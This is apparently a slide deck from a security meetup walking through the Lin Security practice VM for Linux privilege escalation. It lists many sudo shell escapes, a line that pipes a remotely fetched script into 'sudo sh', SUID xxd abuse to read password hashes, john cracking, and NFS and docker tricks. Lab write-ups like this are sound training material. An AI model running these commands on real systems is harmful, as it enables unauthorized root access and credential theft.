These slides cover 30-40 different ways to do privilege escalation and become root. There were presented at Null Bhopal. Details on this link: https://null.co.in/events/491-bhopal-null-bhopal-meet-16-september-2018-monthly-meet

1. Linux Privilege
Escalation with Lin
Security
- Deepanshu

2. whoami
● Null Bhopal Chapter Lead
● Google Summer of code at Debian
● NullCon 2018 volunteer
● Student UIT RGPV
● Open Source contributor
● Footballer

3. What do we know about Lin Security
● Boot to root type
● Specifically for Linux privilege Escalation
● Difficulty level - Easy to intermediate
● Virtual Machine is based on ubuntu 18.04
● One of the User’s name and password is bob / secret

4. Lets start with checking ssh
● We can use telnet for this
● If it prints the ssh version then ssh is running on the box

5. Let's do a full portscan as well

6. We are in

7. Lets explore directories
Finding..
There are directories present for 3 other user
Bob
Susan
Peter

8. This looks like something important

9. Could be susan’s password. Lets try it
Yes it was susan’s password indeed. Let exit out and explore more with bob user.

10. There is some hint in the screenshot provided.

11. With sudo -l we can see ways for
privilege escalation
https://gtfobins.github.io/

12. Some of the easy ways are-
● sudo -i
● sudo ash
● sudo bash
● sudo sh
● sudo csh
● sudo dash
● sudo env /bin/sh
● sudo zsh
● sudo tclsh
● sudo expect -i

13. Medium level ways -
● sudo perl
● exec "/bin/bash";
● ctrl+d
● sudo ftp
● !/bin/bash
● sudo man id
● !sh

14. ● sudo more /etc/passwd
● !sh
● sudo vi
● :bash
● sudo vi -c '!sh'

15. ● sudo awk 'BEGIN {system("id")}'
● sudo find /dev/null -exec sh ;
● We exploit curl by run scripts as root:
curl -sf -L https://raw.githubusercontent.com/d78ui98/Scripts/master/id.sh |
sudo sh

16. One question.
Are there only 3 users?
Bob susan peter

17. We can see /etc/passwd for that

18. Screenshot /etc/passwd

19. ● Using /etc/passwd we found user insecurity.
● It is a root user as it has id 0
● We can easily crack its password with some cracking tool as john.
● And login with insecurity user with root privileges

20. Lets get back to user susan
● We already know its password is MySuperS3cretValue!

21. We are In!

22. ● Susan has rbash
○ Reason 1 : we cannot change directory
○ Reason 2: we cannot change path
● Thats why we have really limited functionalities
● I first thought of getting a normal shell
● We can do it with :
less .bashrc
:!sh
Or simply by bash

23. Just some of
the Methods
that I tried
to get a
normal shell

24. Another approach with user susan
● I noticed that user susan is in group itservices
● We can check the files that are in same group

25. There was lot of output but one
particular result caught my attention

26. xxd allows us to make a hexdump or do the reverse
This is even more interesting:

27. ● The owner of /usr/bin/xxd is root
● SUID allows the binary to run with the privileges of owner
● Since the owner group is in the group itservices
● And susan is also in the group itservices
● We can execute commands as root user

28. Next thing we need to do is find a way to get
sensitive information from xxd

29. After trying and failing with the
option from man xxd I came up with
this:

30. Xxd can also be used to view logs

31. We have the hash of root and all other users
We can use john to crack the passwords

32. Cracking password with john
● Copy the shadow and passwd file
● Unshadow it. Crack it.

34. For some reason john was unable to crack peter’s
password
Lets refer to findings of nmap again

35. Looks like some RPC service is running

36. We can mount peter’s home directory to
a local directory

37. Mounting to a local directory

38. Notice that the user id of contents in peter’s home directory is 1001.
We need to make dummy user with same UID to edit its content
Ubuntu users:

39. Setting correct permission

40. We are In!!

41. Exploiting docker

42. Lets see what are we allowed to run with sudo

43. Again we can make use of GTFObin here

44. That would be almost the end of the session..

45. Thank you!!

46. Questions?

47. Resources
● https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/
● https://payatu.com/guide-linux-privilege-escalation/
● https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
● https://in.security/lin-security-walkthrough/